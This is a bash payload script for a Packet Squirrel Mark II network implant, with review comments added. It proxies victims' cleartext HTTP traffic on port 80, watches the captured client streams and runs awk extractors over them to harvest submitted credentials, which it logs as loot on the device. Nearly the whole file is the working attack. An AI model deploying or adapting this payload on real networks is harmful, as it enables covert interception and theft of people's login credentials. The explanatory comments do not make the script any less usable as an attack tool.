#!/bin/bash
#
# Title: Capturing Credentials Submitted via HTTP
# Description:
# This payload uses inotifywait and DYNAMICPROXY
# to monitor the HTTP POST data streams generated
# by a client and extract sensitive information using awk.
#
# Author: TW-D
# Version: 1.0
# Category: Credentials
# Prerequisites:
# - Packet Squirrel Mark II
#
# Netmode: NAT
#
# STATUS
# ================
# Magenta solid ................................... SETUP
# Yellow single blink ............................. ATTACK
# Waiting for a button press ...................... OFF
# White fast blink ................................ CLEANUP
# Green 1000ms VERYFAST blink followed by SOLID ... FINISH
#
# Reading notes (review):
# - Only TCP port 80 is handed to DYNAMICPROXY below, so only cleartext
#   HTTP is visible to the awk modules; TLS-protected traffic is presumably
#   not inspected (device semantics of DYNAMICPROXY not visible here).
# - Everything the awk modules print is written unencrypted to a plain
#   .log file under the loot directory on the device's own storage.
# - LED, NETMODE, SWITCH, DYNAMICPROXY and BUTTON are device-provided
#   commands; their behaviour is taken from the header above, not verified.

######## CONSTANTS ########
# Payload directory is selected by the physical switch position: SWITCH is
# expected to print that position and it becomes the last path component.
PAYLOAD_SWITCH="/root/payloads/$(SWITCH)"
readonly PAYLOAD_SWITCH
readonly PAYLOAD_LOOTS="${PAYLOAD_SWITCH}/loots"
# Where the per-run log of awk output ends up.
readonly LOOTS_CREDENTIALS="${PAYLOAD_LOOTS}/credentials"
# Where DYNAMICPROXY writes the raw stream files that are watched below.
readonly LOOTS_STREAMS="${PAYLOAD_LOOTS}/streams"
# Directory of *.awk extractors, one awk program per file.
readonly PAYLOAD_MODULES="${PAYLOAD_SWITCH}/modules"
###########################

# Unset variables are an error; note that -e is NOT set, so a failing
# command (mkdir, kill, ...) does not abort the payload.
set -u

LED SETUP
NETMODE NAT

# NOTE(review): the subdirectories are only created when the loots directory
# itself is missing; if "${PAYLOAD_LOOTS}" already exists without the
# credentials/ and streams/ children, they are not created here.
if [[ ! -d "${PAYLOAD_LOOTS}" ]]; then
  mkdir -p "${LOOTS_CREDENTIALS}" "${LOOTS_STREAMS}"
fi

LED ATTACK

#######################################
# Watch the streams directory and run every awk module over each completed
# client stream file, then delete the stream file.
# Globals:   LOOTS_STREAMS (read), PAYLOAD_MODULES (read)
# Arguments: none
# Outputs:   whatever the awk modules print, on stdout (redirected to the
#            per-run log by the caller); inotifywait/awk diagnostics on stderr
# Returns:   does not return on its own; inotifywait --monitor runs until
#            the process is killed
#######################################
credentials_search() {
  # close_write fires once a writer has finished a file, so only complete
  # stream files are processed; '%w%f' yields the full path of that file.
  # The while loop is the last stage of a pipeline and therefore runs in a
  # subshell (no variables escape it, which is fine here).
  inotifywait --monitor --format '%w%f' --event close_write "${LOOTS_STREAMS}" | while read -r dynamicproxy_stream; do
    if [[ -f "${dynamicproxy_stream}" ]]; then
      case "${dynamicproxy_stream}" in
        # Only client-to-server streams are scanned; other suffixes fall
        # through the case untouched but are still removed below.
        *_CLIENT.stream)
          # No nullglob: if the modules directory holds no *.awk file, the
          # literal pattern is passed to awk -f and awk reports an error.
          for awk_module in "${PAYLOAD_MODULES}"/*.awk; do
            awk -f "${awk_module}" "${dynamicproxy_stream}"
          done
          ;;
      esac
      # Stream files are deleted after handling regardless of suffix, so the
      # raw captures do not accumulate on disk; only the awk output persists.
      rm "${dynamicproxy_stream}"
    fi
  done
}

# Run the watcher in the background; stdout and stderr both go to a log
# named by the Unix epoch time of this run.
credentials_search &> "${LOOTS_CREDENTIALS}/$(date +%s).log" &
cs_pid="${!}"

# Start the proxy for port 80; stream files are named with the
# "${LOOTS_STREAMS}/http_" prefix that the watcher above consumes.
DYNAMICPROXY CLIENT "${LOOTS_STREAMS}/http_" 80 &
dp_pid="${!}"

LED OFF

# Block until the button is pressed (per the STATUS table above); NO_LED=1
# is set only in the environment of this one command.
NO_LED=1 BUTTON

LED CLEANUP

# Stop the proxy first, then the watcher (default signal is SIGTERM), and
# flush filesystem buffers so the log survives the poweroff.
kill "${dp_pid}" "${cs_pid}"
sync

LED FINISH

poweroff